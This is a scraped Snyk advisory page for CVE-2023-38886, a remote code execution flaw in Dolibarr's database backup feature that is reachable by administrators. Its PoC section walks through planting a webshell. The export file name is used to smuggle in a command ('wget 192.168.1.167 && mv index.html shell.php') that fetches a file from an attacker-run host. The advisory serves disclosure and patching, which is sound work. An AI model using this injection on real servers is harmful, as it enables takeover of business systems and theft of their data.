<p>A fix was pushed into the <code>master</code> branch but not yet published.</p>

=0.0.0

Threat Intelligence

Proof of concept

0.48% (77^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-PHP-DOLIBARRDOLIBARR-5910188
published 20 Sep 2023
disclosed 20 Sep 2023
credit BELABED Skander

Report a new vulnerability Found a mistake?

Introduced: 20 Sep 2023

CVE-2023-38886 Open this link in a new tab CWE-94 Open this link in a new tab

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

dolibarr/dolibarr is a modern and easy to use web software to manage your business.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the dumpDatabase function due to missing input sanitisation, allowing an attacker to execute arbitrary code via a crafted command/script.

Note: This is only exploitable if the attacker has administrator privileges.

PoC

Add a new file named index.html containing a webshell.
Expose the newly created file on the root folder of a web server.
Go to the backup feature on Dolibarr and select the “mysqldump” export method.
Select the “lowmemorydump” method to hit the vulnerable section.
Put the payload as the export file name (e.g. wget 192.168.1.167 && mv index.html shell.php).
Click on generate backup.

Once done, the webshell should be found in htdocs/admin/tools/shell.php.

References

CVSS Scores

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

Low
Privileges Required (PR)

High
User Interaction (UI)

None

Scope (S)

Changed

Confidentiality (C)

High
Integrity (I)

High
Availability (A)

High